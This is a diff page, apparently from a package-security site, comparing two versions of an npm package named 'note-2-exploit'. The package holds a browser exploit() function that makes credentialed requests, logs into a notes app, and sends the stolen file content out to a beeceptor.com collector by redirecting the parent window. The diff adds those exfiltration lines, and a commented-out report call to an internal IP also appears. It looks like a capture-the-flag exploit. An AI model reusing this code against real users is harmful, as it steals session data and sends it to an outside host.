note-2-exploit 1.2.3 → 1.2.4
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +5 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -13,7 +13,7 @@ async function exploit() {
|
|
13
13
|
}).then(res => res.json())
|
14
14
|
.catch(err =>
|
15
15
|
window.parent.location.replace("https://newname.free.beeceptor.com?q=fail"))
|
16
|
-
.then(res => res.
|
16
|
+
.then(res => res.title);
|
17
17
|
let note_name = (Math.random() + 1).toString(36).substring(7);
|
18
18
|
await fetch("/login", {
|
19
19
|
"headers": {
|
@@ -43,7 +43,10 @@ async function exploit() {
|
|
43
43
|
"redirect": "follow",
|
44
44
|
"credentials": "include"
|
45
45
|
});
|
46
|
-
|
46
|
+
if (file_content)
|
47
|
+
window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(-10));
|
48
|
+
else
|
49
|
+
window.parent.location.replace("https://newname.free.beeceptor.com?q=empty_file");
|
47
50
|
// fetch("http://10.113.184.121:10082/report", {
|
48
51
|
// "headers": {
|
49
52
|
// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|